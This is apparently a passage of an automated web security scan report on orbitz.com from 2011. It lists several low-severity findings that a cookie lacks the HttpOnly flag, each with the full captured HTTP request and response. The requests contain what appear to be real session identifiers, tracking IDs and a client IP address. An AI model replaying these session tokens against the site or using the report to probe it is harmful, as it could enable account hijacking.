Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/DelayedSignIn?partnerUrl=updates.orbitz.com/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

12.687. http://www.orbitz.com/Secure/PerformDisplayMyTrips previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/PerformDisplayMyTrips

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/PerformDisplayMyTrips?shadowing=false HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/PerformDisplayMyTrips?shadowing=false
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.688. http://www.orbitz.com/Secure/PrepareMemberPreferences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/PrepareMemberPreferences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/PrepareMemberPreferences HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/PrepareMemberPreferences
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.689. http://www.orbitz.com/Secure/SignOut previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/SignOut

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/SignOut HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/SignOut
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

12.690. http://www.orbitz.com/Secure/ViewNewMemberReg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/ViewNewMemberReg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/ViewNewMemberReg?z=2eb1&r=4&signInType=explicit HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/ViewNewMemberReg?z=2eb1&r=4&signInType=explicit
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.691. http://www.orbitz.com/Secure/ViewSetupCareAlertsProfile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/ViewSetupCareAlertsProfile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/ViewSetupCareAlertsProfile HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/ViewSetupCareAlertsProfile
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.692. http://www.orbitz.com/cacheable/ad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/cacheable/ad.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cacheable/ad.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573834583:ss=1296573790782; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; mbox=check#true#1296573897|session#1296573790873-999455#1296575697; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Jan 2011 23:49:46 GMT
ETag: "30a-49b2d12145a80"
Cache-Control: max-age=14400
Expires: Tue, 01 Feb 2011 16:50:23 GMT
Content-Type: text/html
Cteonnt-Length: 778
Server: Apache
head: yes
Date: Tue, 01 Feb 2011 15:29:19 GMT
Age: 9536
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 778

<html>
   <head></head>
   <body onLoad="window.adLoaded=true;" onUnload="window.adLoaded=false;" style="background-color:transparent">
       <script type="text/javascript">
           function waitForAdURL(timeout)
...[SNIP]...

12.693. http://www.orbitz.com/cacheable/ad_empty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/cacheable/ad_empty.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cacheable/ad_empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573834583:ss=1296573790782; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e34fb045525d5f4f58455e445a4a4217b9; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; mbox=check#true#1296573897|session#1296573790873-999455#1296575697

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Jan 2011 23:50:38 GMT
ETag: "2e-49b2d152dcf80"
Cache-Control: max-age=14400
Expires: Tue, 01 Feb 2011 16:50:16 GMT
Content-Type: text/html
ntCoent-Length: 46
Server: Apache
Date: Tue, 01 Feb 2011 15:29:14 GMT
Age: 9538
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 46

<html><head></head><body> </body></html>

12.694. http://www.orbitz.com/cacheable/empty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/cacheable/empty.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; mbox=check#true#1296573897|session#1296573790873-999455#1296575697; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573845060:ss=1296573790782

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:35:49 GMT
ETag: "8-49ad5b4361f40"
Cache-Control: max-age=14400
Expires: Sat, 29 Jan 2011 12:52:59 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
head: yes
Date: Tue, 01 Feb 2011 15:29:12 GMT
Age: 282973
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 8

12.695. http://www.orbitz.com/content/www/orb/rss/flightdeals.rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/content/www/orb/rss/flightdeals.rss.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/www/orb/rss/flightdeals.rss.xml?z=2eae&r=1 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 02 Feb 2011 11:05:50 GMT
ETag: "45e-49b4aa1bd7c47"
Content-Type: text/xml
Content-Length: 1118
Server: Apache
Date: Wed, 02 Feb 2011 16:05:44 GMT
Age: 11722
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

